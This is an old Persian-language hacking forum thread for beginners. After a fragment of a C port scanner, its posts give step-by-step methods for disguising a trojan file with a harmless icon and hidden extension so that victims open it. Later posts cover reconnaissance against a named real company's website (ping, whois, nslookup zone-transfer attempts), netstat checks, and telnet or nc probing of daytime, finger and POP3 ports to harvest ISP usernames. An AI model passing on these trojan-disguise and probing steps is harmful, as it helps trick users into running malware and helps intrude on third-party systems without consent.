arta_commandline_win_DieWithError("ERR: Cannot Cre....!"); arta_win_CreateServerAddressStructure(&addr,port,I P); if(arta_win_EstablishUdpSocketConnection(sock, &addr)==-1){ printf("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b \b....."); } else{ printf("\b\b\b\b\b\b\b\b\b\b\b"); printf("OPEN \n"); } arta_win_CloseSocket(sock); } } همان کارها را ولی اين‌بار برای udp انجام می‌دهد. و حالا آخر برنامه: puts("\n"); arta_commandline_win_EndMessage("Simple Port Scanner"); arta_win_CloseSocket(sock); arta_win_CleanWinsock(); exit(0); } در اينجا پيغام انتهايی چاپ شده و سوکت بسته می‌شود.
گرفته شده ازسایت:[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) نظر یادت نره

mazi_z_PSP
12-05-2007, 20:00
آیکون و پسوند تابلوی ترجان ها را به هر چی که دوست دارید [هک]

برای اینکار 2 راه موجود می باشد که من این 2 راه را برای شما میگم:
راه اول :
یک عدد فایل تروجان آماده کنید...
یه wordpad باز کنید ( می تونید رو دسکتاپ راست کلیک کنید به new برید و یه wordpad documernt باز کنید .
فایل تروجان رو کپی کنید و توی wordpad پیست کنید یا میتونید فایل رو با ماوس بکشید و تو صفحه word رها کنید .
حال همون فایلی رو که تو word گذاشتید را انتخاب کنید . یعنی روش تک کلیک کنید
بعد به edit برید و بعد به package object و روی برگه edit package کلیک کنید حالا در پبجره باز شده به edit برید و copy package رو بزنید .
در آخر هم به یکی از فلودر ها یا درایوها برید راست کلیک کنید و paste رو بزنید .
به همین آسونی فایل تروجان exe یا هر اسم دیگری را میتونید بی نام و نشون کنید و علاوه بر اینکه ایکون فایل شبیه این بچه مثبتا میشه به همین راحتی هم پسوندشو لو نمی ده اصلا پسوندی در کار نیست .
راه دوم :
بر روی فایل تروجانی کا آماده کرده اید راست کلیک کنید وگزینه create shortcut را بر گزینید . حالا یه فایل از همون تروجان با اسم shortcut درست شده است حالا بر روی shortcut آن راست کلیک کنید و گزینه Properties را انتخاب کنید حال در پنجره باز شده جدید در بالای آن گزینه shortcut را انتخاب کنید و بعد بر روی گزینه change icon کیک کنید و در پنجره باز شده 100 ، 200 تا آیکون ظاهر میشود حالا هر کدوم را که دوست دارید انتخاب کنید و یا می تونید با زدن گزینه browse آیکنی که خود شما دارید را برگزینید

mazi_z_PSP
12-05-2007, 20:01
انواع هکرها:
1- گروه نفوذگران کلاه سفید: (white hat hackers) : هر کسی که با دانش خود بتواند از سد موانع امنیتی یک شبک بگذرد و به داخل شبکه راه پیدا کند اما اقدام خرابکارانه ای انجام ندهد را یک هکر کلاه سفید می خوانند. خب حتما می گویید عجب ترجمه سختی ما که هیچ نفهمیدیم. عجله نکنید. اینم مثال راحتش. تصور کنید دانشجویی که در یک دانشگاه درس می خونه و می دونه تمامی لیست حضور و غیاب و نمرات دانشجوها در کامپیوتری در اتاق شبکه دانشگاه قرار داره. حالا این دانشجوی کنجکاو ما برای اینکه سر و گوشی آب داده باشه مدتها روی شبکه دانشگاه کار می کنه و از راه های مختلف( که خارج از بحث و حوصله این مقاله است و اگر بخوام راستش رو بگم میشه 100 ها کتاب راجعش نوشت) وارد اون شبکه میشه. یعنی به طور معمول هیچ دانشجویی حق نداره بتونه نمراتش رو ببینه ولی این پسر ناقلای ما یه جورایی وارد شبکه میشه و نمراتش رو می بینه و همچنین حضور و غیابش رو. خب این پسر ناقلا یک هکره. چون این پسر ناقلا فقط نمرات رو می بینه و دست کاری نمی کنه(لابد وجدانش اجازه نمی ده) یک هکر کلاه سفید میشه.
به عنوان مثالی دیگر هکرهای کلاه سفید متخصصین شبکه ای هستند که سوراخهای امنیتی شبکه را پیدا می کنند و به مسوولان گزارش می دهند. مثلا این دانشجوی ناقلا می تونه بره به مسوول شبکه بگه که چطوری وارد سیستمش شده( چون حتما یه ضعفی داشته دیگه) بعدش اونا هم بهش قاقالیلی میدن!

2-گروه نفوذگران کلاه سیاه (Black hat hackers) : به این گروه کراکر –Cracker- می گویند. این افراد آدمهایی هستند که با دانشی که دارند وارد کامپیوتر قربانی خود شده و به دستکاری اطلاعات و یا جاسوسی کردن و یا پخش کردن ویروس و غیرو می پردازند( در انتهای همین مقاله انواع راه های نفوذگری بحث شده). مثلا همون دانشجوی ناقلای مثال بالا اگر بره داخل شبکه و نمراتش رو عوض کنه و به خودش همش بیست بده و یا ایمیل دختر رییس دانشگاه رو از اون تو کش بره و نامه نگاری عاشقانه راه بندازه و یا اصلا روی تمام سیستمهای دانشگاه ویروس بندازه دیگه میشه یک کراکر. پس آقایون و خانومها دانش یک شخص می تونه در جهت مثبت به کار بره یا منفی. لب کلام اینکه اگر اون شخص آدم خوبی بود و تو شبکه دست کاری نکرد بهش میگن کلاه سفید اگر شرور بود و عشق خرابکاری بهش می گن کلاه سیاه. مثل یه آدمی تصور کنید که کشتی گیره. اگر هوای ضعیف ضعفا رو داشته باشه بهش میگن پهلوون اما اگر قلدر بازی واسه همه در بیاره مردم بهش می گن لات و چماق کش!

3-گروه نفوذگران کلاه خاکستری (gray hat hackers) : خب شاید سخت ترین کار توصیف حوزه این گروه از نفوذگرهاست. به این نفوذگرها بعضا whacker هم می گویند( البته زیاد مصطلح نیست فقط برای اطلاع بدانید). این گروه از نفوذگرها بنا به تعریفی حد وسط دو تعریف گذشته هستن. یعنی گاهی شیطنت می کنن و توی سیستم خرابکاری می کنن و گاهی خرابکاری نمی کنن! یعنی اینکه هم کلاه سفیدن هم کلاه سیاه واسه همین رنگشون رو قاطی کردن شده خاکستری! بنا به تعریف دیگه کلاه خاکستری ها شیطونی هاشون هم عامه پسنده یعنی اگر بخوان خرابکاری کنن در جهت اطلاع عموم انجام میدن و به قول معروف فی سبیل الله و برای مردم. مثلا اون دانشجوئه مثال بالا اگه بیاد یه نسخه از لیست حضور و غیاب رو به ایمیل تمام دانشجویان دیگه بزنه و بگه برید حالا حالش رو ببرید و ببینید هرکی چقدر غیبت داره و نمره تحقیقش چند شده.
4- گروه نفوذگران کلاه صورتی ( pink hat hackers): خب این دسته بندی به ندرت دیده شده و اکثر مواقع کلاه صورتی ها رو جزیی از کلاه سیاه ها می دونند. به زبان شیرین فارسی اینها همون جوجه هکرها هستند! این افراد آدمهای کم سوادی هستند که فقط با چند نرم افزار به خرابکاری و آزار و اذیت بقیه اقدام می کنن. مثلا شماها رو توی مسنحر یاهو بوت می کنن و یا توی چت رومها خرابکاری می کنن و یا با نرم افزارهای آماده ایی مثل ساب سون و غیرو اقدام به هک کردن بقیه می کنن و از این قبیل. بنابراین به کلاه صورتی ها می گیم جوجه هکر!

انواع حمله هکرها:
- استراق سمع (interception) : در این روش نفوذگر موفق شده که در حین تبادل اطلاعات گوش کند. وی مخفیانه این اطلاعات را مورد نظر داشته و اطلاعات مورد نیاز را برای خودش نسخه برداری می کند. تکنیک ها و روش های بسیاری را هکرها در استراق سمع به کار می برند که یکی از آنها همان sniff بود که در مقاله چند روز قبل کوتاه به آن اشاره کردم. بگذارید مثالی بزنم تا 2 زاریتان کاملا بیفتد. شما در حال مخ زدن در روی اینترنت هستید و شبهای متمادی وقت گذاشتید مخ این دختره رو بزنید و شمارش رو بگیرید. در حال چت کردن هستید که بالاخره عروس خانوم شماره رو به شما میده و شما خوشحال که فردا حتما بهش زنگ می زنید. اما شمای بدبخت نمی دونید که یه هکری ناقلایی کامپیوتر شما رو زیر نظر داره و کلیه چت های شما و اون خانوم رو داره می بینه. اون هکره داره استراق سمع می کنه. حرفاتون براش دلچسب نیست ولی به محض دیدن اون شماره تلفن براش جالب توجه میشه! اینکه شماره تلفن رو یادداشت می کنه و فردا زنگ می زنه به دختره و همون صبحش قرار می گذاره و عشق و حالی که نگو. سر بدبخت شما هم کلاه میره. این جوریاس دیگه. باید زندگی کرد!!!
- دستکاری اطلاعات (modification ): نفوذگر عزیزمون موفق به تغییر اطلاعات میشه. در اینجا بدون اطلاع از قربانی بدبخت, هکر ما اطلاعات رو تغییر میده. مثلا یکی بیاد و بره داخل لیست نمرات یک دانشگاه و نمراتش رو همچین یک حال اساسی بهشون بده و معدلش از 13 بشه 18!
- افزودن اطلاعات و جعل ( fabrication ): در این روش نفوذگر اطلاعات رو به سرقت نمی بره و یا جایگرین نمی کنه بلکه به اطلاعات فقط اطلاعات دیگری رو اضافه می کنه. مثلا فرض کنید مدیر شرکتی نامه ای می زنه به مسوول خرید و لیست خریدی برای شرکت میده. حال شما که هکر بسیار زرنگی هستید این نامه رو جعل کرده و یه سری چیزها بهش اضافه می کنید مثلا می نویسید که خرید یک میز جدید برای آقایی که خودتون باشید! و بعد نامه رو می فرستید برای مامور خرید. مامور خرید بی نوا هم میره لیست رو تهیه می کنه. به واقع شما در اینجا اطلاعات حاوی اون نامه رو همون طور که هست می گذارید باشه ولی بهش مطالب جدید هم اضافه می کنید. هرچند می شه این اقدام رو در زیر شاخه modification آورد اما میگم شما زیاد درگیر گروه بندی نشید بلکه مفهوم رو متوجه بشید که به واقع هدف اصلی این مقاله همینه.
- حمله از نوع وقفه ( interruption): در این نوع حمله هکر باعث اختلال در شبکه و تبادل اطلاعات میشه. تکنیک های بسیاری وجود داره برای هکرها اما 2 مثال بسیار مشهود که نتیجه اش برای یک وبگرد به وضوح مشخصه و در نتیجه همین حملات صورت می گیره یکی در چت رومهاست که گاهی می بیند کسی کامپیوتر سرور چت رو وقفه می ندازه و دیگر شما قادر به چت در آن چت روم نیستید و یا اینکه حتما شنیده اید وقتی هکری به یک سایت حمله کرده و باعث کندی آن سرور شده و این باعث می شود که اگر سایت در عرض 5 ثانیه می بایست در مرورگر شما ظاهر شود یا اصلا قابل بارگزاری نیست (سایت به قول معروف لود نمی شود) و یا اینکه بعد از مثلا 1 دقیقه ظاهر می شود. اینگونه حملات بلای جان کسانی است که مسوول یک سایت و یا شبکه هستند چرا که کندی شبکه همانا و سر و صدای مدیر در آمدن همانا.

mazi_z_PSP
12-05-2007, 20:06
سلام اینم اموزش کامل انواع هک که شامل اموزش هک کردن سایت و وبلاگ هم میشه و به یه سری سوالات کلیدی شما هم جواب داده شده معمولا سوالهای شما در اولش ايناست ۱-هک چيه آيا وارد شدن به يه کامپيوتر هک محسوب ميسه؟ ۲-وقتی يه کامپيوتر خاموشه ميشه هکش کرد؟ ۳-آيا برای اينکه يک هکر شويم بايد خودمان يه بار هک شده باشيم؟ البته سوال که زياده ولی معمولا همه ی شماها همين ها رو میپورسين. حتما تو اين چند روزه در باره ی اين ويروس جديده خبرهايی شنيده ايد.يکيش وب لاگ خودم.که بعد از اون ماجرا ماکروسافت گفت patchمخصوص ويندوز ها ی گوناگون رو نصب کنيد.خوب اين يعنی چي؟يعنی اين که سيستم عامل ها را انسان ها درست ميکنن بنابراين خطای آن ميشه گفت ۵۰تا۵۰ است در نتيجه به اين خطاها bugگفته ميشود که هر شرکت تا اين سوتی ها رو ديده سريعا اين patchرو برای ماسمالی کردن و در امن ماندن از دست هکرها پخش ميکنه.خوب ببينيد بعضی از هکرها اصلا اين وظيفه را دارند که ضعف اين شرکتو نشان بدم البته ما نوع های مختلفی داريم که در حوصله اين مقاله نميگنجد . به چه چيزهايی برای شروع نياز داريم: ۱-ابتدا زبان Cرا فرابگيريد. برای چي؟برای صحبت با پورتهای مختلف ۲-Dosرا خوب بلد باشيد.برای چي؟برای استفاده از FTP SERVER ۳-دو سيستم عامل داشته باشيد .يکی از خانواده ی ويندوز و ديگری از خانواده ی Unix IP:مهمترين چيز و راحترين چيز در هکه که خيلی راحت به دست مياد و اهميت فوق العاده ای برای Telnetکردن به سايتهای مختلف و دودر کردن اينترنت و.... Whois:تعريف خاصی ندارد اما ميشه گفت اطلاعات هر سايت را به ما ميده Telnet:برای صحبت با ورتها و وارد شدن بهFTPالبته اين تعريف درست و کامل نيست. Port:در زبان فارسی به معنای بندر است خوب حالا کامپيوتر Serverرا جزيره در نظر بگيريد وکه چندين بندر دارد و هرکدام از اين بندرها کاره خاصی ميکنند. بدست آوردن IPخودمان بعد از اتصال به نت: 1-رفتن به CMDويندوز XPويا DOS۹۸وتايپ کردن اين عبارتnetstat -n 2-Clickراست کردن بر روی اون دوپنجره پايين Desktopهمان دو پنجره ای که وقتی به نت وصل هستيم چشمک ميزنه و بعد انتخاب گزينهSatusو زدن Deatilدر بالای پنجره و ديدن IPخودمان در پايين صفحه و IP SERVERدر بالای آن طبقه بندی IP ها: IPها به ۵ کلاسAتاEتقسيم ميشوندکه بر حسب اهميت کلاسAتاCمورد اهميت تر است و ما هر ۵ نوع را برای شما بيان ميکنيم ۱-قالب ۳۲ بيتی کلاس Aاين گونه است۷بيت شبکه و ۲۴ بيت کاربر.اگر IPرا اينگونه فرض کنيمxxx.yyy.zzz.rrrاين کلاس شامل تمام IPهايی ميشود که xxxهای آن بين1تا۱۲۶است.هر گاه پرارزشترين بيت IP آدرس صفر باشد , آدرس از كلاس A است . همانگونه كه مشاهده ميكنيد بخش شبكه اين كلاس قادر به ادرس دهي 127 شبكه ميباشد و ميتواند حدود 17000000 كاربر داشته باشد . بنابراين به اين نتيجه ميرسيم كه ادرسهاي كلاس A شبكه هاي ستون فقرات اينترنتي هستند . ۲-قالب 32 بيتي كلاس B بصورت زير است : آدرس كاربر(16 بيت) آدرس شبكه(14بيت) 10 هر گاه پرارزشترين بيتهاي IP آدرس10 باشند , آدرس از كلاس B است . همانگونه كه مشاهده ميكنيد بخش شبكه اين كلاس قادر به ادرس دهي 16382 شبكه ميباشد . كه هر يك ميتواند 65534 كاربر داشته باشد . بنابراين به اين نتيجه ميرسيم كه ادرسهاي كلاس B شبكه هاي عظيم اينترنتي هستند كه تمام اين آدرسها امروز تخصيص داده شده اند .اينIPها تمام xxxهايی را شامل ميشوند که عددشان بين128تا۱۹۱است و از کلاسهای پر کاربرد هستند. ۳-قالب 32 بيتي كلاس C بصورت زير است : آدرس كاربر(8 بيت) آدرس شبكه(21بيت) 110 در اين كلاس پرارزشترين بيتها 110 هستند . اين كلاس پر كاربردترين كلاس است . در اين كلاس با توجه به آدرس 21 بيتي شبكه , ميتوان حدود 2000000 شبكه تعريف كرد.و اين کلاس تمام IPهايی را شامل ميشود که xxxهای آنها بين192تا۲۲۳است. ۴-آدرسهاي كلاس D : قالب 32 بيتي كلاس D بصورت زير است : آدرس كاربر(28 بيت) 1110 در اين كلاس پرارزشترين بيتها 1110هستند . و 28 بيت بعدي براي مقاصد گروهي بكار ميروند . ۵-آدرسهاي كلاس D : قالب 32 بيتي كلاس D بصورت زير است : آدرس كاربر(28 بيت) 1110 در اين كلاس پرارزشترين بيتها 1110هستند . و 28 بيت بعدي براي مقاصد گروهي بكار ميروند . خلاصه ای از مطالب بالا: اين هم خلاصه ی مطالب مهم که اگر حوصله خواندن اين کلاسهای IPمسخره را نداريد 1- كلاس A : عدد سمت چپ IP ادرسهاي كلاس A بين 0 تا 127 ميباشد . 2- كلاس B : عدد سمت چپ IP ادرسهاي كلاس B بين 128 تا 191 ميباشد . 3- كلاس C : عدد سمت چپ IP ادرسهاي كلاس C بين 192 تا 223 ميباشد . فعلا تا اینجا رو داشته باشید.

mazi_z_PSP
12-05-2007, 20:07
سلام خوب حالا فکر کنم مفهوم IPقشنگ براتون جاافتاده ميريم سر دستورها بدست آوردن IPيک سايت: در اولين قدم هک چه کلاينت و چه سرور بايد IPرو بدست بياوريم.که برای به دست آوردن IP يک سرور يا سايت ۲ روش وجود دارد البته نرم افزارهای زيادی در اين مورد هست که به موقعش معرفی ميکنم ۱-در CMDويندوزتان برويد و اين عبارتو تايپ کنيدping <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]وبه/</A> جای domainآدرس اينترنتی سايت خودتونو بنويسيد مثلا در مورد سايت يك سايت قبلا امتحان کردم شده: ping <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> Pinging <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> [66.48.76.205] with 32 bytes of data: Request timed out. Request timed out. Request timed out. Reply from 66.48.76.205: bytes=32 time=855ms TTL=106 Ping statistics for 66.48.76.205: Packets: Sent = 4, Received = 1, Lost = 3 (75% loss), Approximate round trip times in milli-seconds: Minimum = 855ms, Maximum = 855ms, Average = 855ms بعد IPاين سايت [66.48.76.205]است.و يه سرس اطلا عات ديگه با همين دستوره کوچولو به دست اومد که بعدن سر موقعش همشو بهتون تو ضيح ميدم. روش دوم۲-همان Whoisکردن است که در اوايل صحبتهايم براتون تعريفش کردم اين راه به نظر شخصی من بهتر از PINGکردنه چون اطلاعات جامع تری رو ميده و يکی از همين سايتها که هر هکری بهش علاقه منده اينه برای ديدنش اينجارو کليک کنيد.و برای Whoisکردن اين عبارتو در اينترنت اکسپلولر تايپ ميکنيم و Enterميزنيم <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]که</A> به جای اين ضربدرها آدرس سايت مورد نظر خود را بنويسيد مثلا در مورد همون سايت اين ميشود <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> خيلی از شماها حتما فرق اين دو روش را فهميدين در روش Whoisاطلاعات ذيقيمتی رو بدست مياورين در اصل ميشه گفت اين روندها مثل زنجير بهم پيوستن خوب اطلاعاتی که گفتم همونDNS ServerياDomain Serverاست و به وسيله همين DNS Serverو با استفاده از دستور nslookupاطلاعات ذيقيمت تری رو بدست مياوريد. استفاده از دستور مهم nslookup وقتی DNS Serverيک سايتو بدست آورديم با استفاده از روش Whoisکردن که در بالا گفتم و اين آدرس هميشه در سطر آخر ديده ميشود و معمولا به اين شکل است در مورد همون سايت امتحان کردم شد s1.moaddabfurniture.com s2.moaddabfurniture.com خوب حالا شروع ميکنيم اين دستورو در CMDتايپ nslookup وEnterکنيد نتيجه به اين شکل است: *** Can't find server name for address 192.168.20.3: Non-exi... *** Can't find server name for address 192.168.20.1: Non-exi... *** Default servers are not available Default Server: UnKnown Address: xxx.xxx.xx.x خوب حالا اين عبارتو تايپ ميکنيم server dns_serverو به جای dns_serverهمون DNS Serverاوليه را تايپ ميکنيم مثلا در مورد همون سايت ميشه server s1.moaddabfurniture.comاگه احيانا به پيام اخطار برخورد کرديد DNS Serverدوم را وارد کنيد فکر کنم متوجه شديد جريان از چه قراره اينبار شما وارد محيط nslookupشديد پس اينجا هم از دستور ها ی متفاوتی پيروی ميکنه که هرکدو اطلاعات خاص خودش ميده که الان من اين دستورها رو ميگم ولی شما از بعضی نتايجش ميتونين اطلاعات ذيقيميتی رو بدست آوريد. set type=any بعدش اينو تايپ کنيدls -d site_name و به جای siteاسم سايتتونو بنويسيد مثلا ls -d moaddabfurniture.com خوب اگه شماها تا حالا رو يه سايت کارای بالا رو کرده باشين دستتون پره به زبان عاميانه يعنی شما دارين خودتونو شارژ ميکنين برای حمله به سايت قربانی اگه موافق باشيد در بار بعد بريم سر بحث پورتها پس فعلا با اجازه

mazi_z_PSP
12-05-2007, 20:09
سلام مفهوم پورتها به طور کامل و مشخصات آن خوب اين بحث مهمترين کارمونه چون ميخوام پو رتها رو بشناسيم و به اونها تلنت کنيم چون تا وقتی که نفهميم کدوم پورت چه کاری انجام ميده نميتونيم موفق بشيم ۱- پورت‌های 0 تا 1023 : مشهورترين پورت‌ها هستند و معمولا هرکدام برای يک سرويس خاص استفاده می‌شود. با تعدادی از اين پورت‌ها در قسمت های قبل آشنا شده‌ايد. ۲- پورت‌های 1024 تا 49151 : اين سری از پورت‌ها مشخصا با هيچ‌يک از سرويس‌های اينترنتی مرتبط نيستند بلکه وقتی که با يک ابزار شبکه مانند مرورگر اينترنت(مثل Internet Explore يا Netscape Navigator )، نرم‌افزار ارسال و دريافت E-mail (مثل Outlook يا Edura )، نرم‌افزارهای FTP (مثل WS-FTP يا Cute-FTP ) کار می‌کنيد، يکی از اين پورت‌ها به صورت random باز شده و يک ارتباط با سرور (با توجه به‌نوع سرويس اينترنتی که می‌دهد که يکی از پورت‌های 0 تا 1023 است) برقرار شده و داده‌ها ارسال و دريافت می‌شوند. يعنی پورت شما يکی از پورت‌های اين قسمت است و پورت سرور يکی از پورت‌های بالايی.اين سری پورت‌ها را پورت‌های register شده هم می‌گويند. ۳- پورت‌های 49152 تا 65535 : اين سری از پورت‌ها به‌ندرت استفاده می‌شوند. کاربرد اساسی آنها برای يک سری سرويس‌های خاص اينترنتی است و يا توسط trojanها (که برای ---- کردن کامپيوتر است) به کار میرود. البته خيلی از trojanهای معروف از پورت‌های رديف ۲ هم استفاده می‌کنند و اين تقسيم‌بندی‌ها هميشه برقرار نيست و به‌همين علت است که گاهی پورت‌ها را به دو‌دسته زير 1024 و بالای 1024 تقسيم‌ می‌کنند. فکر کنم الان مفهوم پورت براتون جا افتاد و اما يه مطلب مهم: شما بايد با مدل TCP/IPآشنا باشيد اگه نيسيتيد ياد بگيريد اينم از مقدمات يه هکر شدنه در ضمن من ميخوام آموزشش بدم ميتونين نه کتاب بخرين نه پول آموزشگاه بدين پس آروم آروم من هم به سايت رونق ميدم اما من گفتم و بازم ميگم تايپ فارسی خوب نيست اگه يه شريک مشتی گير مياوردم مطالب بالا رو با هم کامل و دو نفری مشغول باشيم هم شماها بيشتر حال ميکردين هم ما به خدا به هرحال بايد با تنهايی ساخت ولی حتما اين TCP/IPرو ميگم اما گفتم زبان Cرو بريد بيرون ياد بگيريد من نميتونم اينطوری تو وبو بنويسم. پورتهای باز وبسته ی يک سرور را چگونه تشخيص دهيم معمولا اين کارها را نرم افزارها ميکنند نه خود کاربر يه توضيح کوچولو در مورد Whois اگر شما ميخواین Whois کنيد و از همان سايت samspadeاستفاده کنيد شايد جواب نده علتش رو بعدن ميگم اما برای اينکه یه کم بدونين به دليد مسایل دامين و جغرافيايی است پس از اين دستور استفاده کنيد مثلا آخر سايت شما .comداره اونوقت منظورمو ميگيرين اينم دستورش که در اينترنت اکسپلولر تو ضيح دادم . <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> و به جای ضربدر ها آدرس سايتو مينويسيد اينم مخصوص سايتهايی که آخرشون .irداره/[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] اينم مخصوص اونايی که آخرشون .twو.bizو.cc <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> و ميخوام در مورد سايت رشد ببينيم خوب اين آدرسشهRoshd.irو به جای xxxxxxهامنويسيم Roshdو به جایyyyyمينويسيم .irفکرکنم الان خوب متوجه شده باشيد. چند نکته مهم در مورد PINGو دستوراتش اگه يادتون باشه اون اولای مقاله به یه سایت Pingکرديم خوب حالا ميخوام اون نتايجی رو که گفتم بعدن بهتون ميگم رو الان بگم چون الان مفهموم هک و خيلی چيزارو يادگرفتين بريم تو کارش چشم دستورشم يه بار ميگم که مجبور نشی دو ساعت بری بالا بگردی دنبالش Ping <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> domain or your ip اينم نتيجش ping <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> Pinging <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> [66.48.76.205] with 32 bytes of data: Request timed out. Request timed out. Request timed out. Reply from 66.48.76.205: bytes=32 time=855ms TTL=106 Ping statistics for 66.48.76.205: Packets: Sent = 4, Received = 1, Lost = 3 (75% loss), Approximate round trip times in milli-seconds: Minimum = 855ms, Maximum = 855ms, Average = 855ms خوب اين داره ميگه که زمان رسدن به پکت رو ميگه خودتون ببينيد که به سرعت شما و ترافيک و خطوط شبکه بستگی داره البته من بعضی جاهاش حذف کردم اما عبارت جلوی Replyتايم رسيدن را نشان ميده و يه نکته مهم ديگه اينکه با توجه به سطر آخر ميفهميم lover-hackers.comفعال هست يا نه الان تو مثال بالا فعال است اما اگه عددهای جلوی عبارتهایMinimumوMaximumوAvreageصفر شود اونوقت يعنی فعال نيست. موفق باشيد
سلام دستور Tracert اين دستور ميگه که از چند تا کامپيوتر بگذريم تا به lover-hackers.comبرسيم دستور رو در CMdبه اين شکل اجرا کنين tracert your domainکه به جای your doaminآدرس سايتو بنويسيد. پورتهای باز کامپيوتر خودمان را ببينيم خوب شما الان چون با مفهوم پورت آشنا هستيد و ميدونيد در هک اساسی ترسن کارها رو پورت انجام ميشه و حتی با ميتوان با باز بودن پورت يک کامپيوتر بهش نفوذ کرد اين خيلی مهمه که پورتهای باز خودتونو ببينيد.از يکی از اين دو دستور استفاده ميکنيم . ۱-درCMDويندوزتان تايپ کنيدnetstat -anکه اين دستور پورتها رو به صورت عدد نشون ميده به خاطر اون numberآخرش ۲-دستور netstat -aمعادل اسمس آن پورت را نمايش ميدهد من قسمتيش واستون ميگم در خط اولش نوشته Protoکه معادل آن است که پروتکل شما TCP or UPDاست بعد ميريم سراغLocal Adress که اونجا هم IPرو نوشته وپورتها رو البته ماله خودتون است و در آخر Stateوضعيت اتصال رو نمايش ميده حالا با استفاده از اينا چيکار کنيم؟خوب ميتونيم ببينيم Trojanروش فعال است يا نه؟ يه توضيح کوچک در مورد تروجان بدم که اسبهای تروجان ويروسهايی هستن که پورت خاصی رو کامپيوتر طرف باز نگه ميدارن و شما به اون کامپيوتر نفوذ ميکنيد که معروفترین اونا ساب سون هست. به دست آوردن اسم کامپيوتر يک کلاينت: اول يه تعريف کوچولو برای کلاينت:به کامپيوترهايی که با Dial upوصل هستند يا در تعريف خودمانی همون کامپيوترهای خودمنو ميگيم .خوب برای به دست آوردن اسم کامپيوتر طرف بايد باهاش چت کنين اما برای مطمعن شدن بايد بگی طرف Voiceبده. اگه داد اين عبارتو تايپ کنيدnetstat اما مهمترين چيز اين است که به دنبال شماره ۵۱۰۱بگردين چون اين کمک به حال گيری ميکنه. معرفی پورتها و صحبت کردن با آنها مراحل آخر هک : خوب بايد ياد بگيريم با پورتها صحبت کنيم اين مطلب راحته و همش از يه دستور استفاده ميشه صحبت با پورت ۱۳ ۱-پورت ۱۳ که پورت Daytimeناميده ميشه خيلی ساده لوحه و هميشه راست ميگه البته هميشه اين پورتو ميبندن يا به قول معروف خفش ميکنن برای صحبت کردن با آن اين دستور را اجرا کنيد telnet ip adress 13يا nc -v ip adress 13 خوب به چه درد ميخوره؟ميتونيم تشخيص بديم کامپيوتر در ايران است يا نه با توجه به تاريخ و ساعتش مفهومه که؟ صحبت با پورت ۷ اين پورت کاره خاصی نميکنه فقط هر چی بهش بدين براتون همونو پس ميفرسته چه مسخره!!! بعد اينم دستورشtelnet your ip adress 7يا nc -v ip 13و به جای همه ی دستورات بالا به جای ip ياypur ip adressشماipسايتتونو بنويسيد صحبت با پورت ۸۰ اين پورت کارش اينه که برای جستجوی صفحات اينترنتی ميره اولين دستور ميگه هر چی headerهست رو نشون بدهGET /[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]نتايج من ديگه نشون ندادم خودتون امتحان کنيد. جالبه!!! دومين دستور ميگه که هر چی هست يعنی در اينجا whatکار ميبريم نشون بده GET /what/everولی شما رای اين کار مسيرو بديد کجاهارو ميخوان مثلاexe صحبت با پورت ۷۹ مهمه خوب اين پورت Endeحاله يعنی اينکه شما ميتونين با استفاده از اين دستور بفهمين چند نفر از کاربران ISPشما onهستن و همچنين شايد خوش شانس باشيد و ISPدر پيتس باشه USER NAMEهم ميده و مثلا اسم يه کامپيوتر alborzاست خوب اينم ۳ تا دستور برای گرفتن اطلاعات telnet alborz.com79 nc -v alborz.com79 finger @alborz.com79 اين پورت بستگی به سرور داره ممکنه usernameهم نشون بده و حتی نام نام خانوادگی افراد آنلاين پس همين الان دسته به کار شويد و به serverهای مختلف telnetکنين و اين usernameهام که گفتم به چه دردی ميخوره به درده دود کردن اينترنت ميخوره صحبت با پورت ۱۱۰ اين پورت برای خواندن ايمیل به کار ميره مثلا من در نو آور ايميل دارم پس ميخوام ايميلهامو چک کنم تايپ ميکنمtelnet mail.noavar.com 110ياnc -v mail.noavar.com 110 بعدش وارد يه محيط مثل ftpميشين بعد از شما userوpassميخوادکه شما بدين خوب الان در درون ايميل هايتان غلط ميزنيد و اين دستورهای مهم را هم اجرا کنيد اين دستور حجم کليه ايميلهای رسيده را ميگهstat اين دستور ليست پيام ها رو ميگه list در اين دستور متن نامه رو ميخوانيم البته بگم شماره ی مورد نظرتونو برای خواندنش وارد کنيدretr پاک کردن ايميل dele 54 برای خارج شدنquit 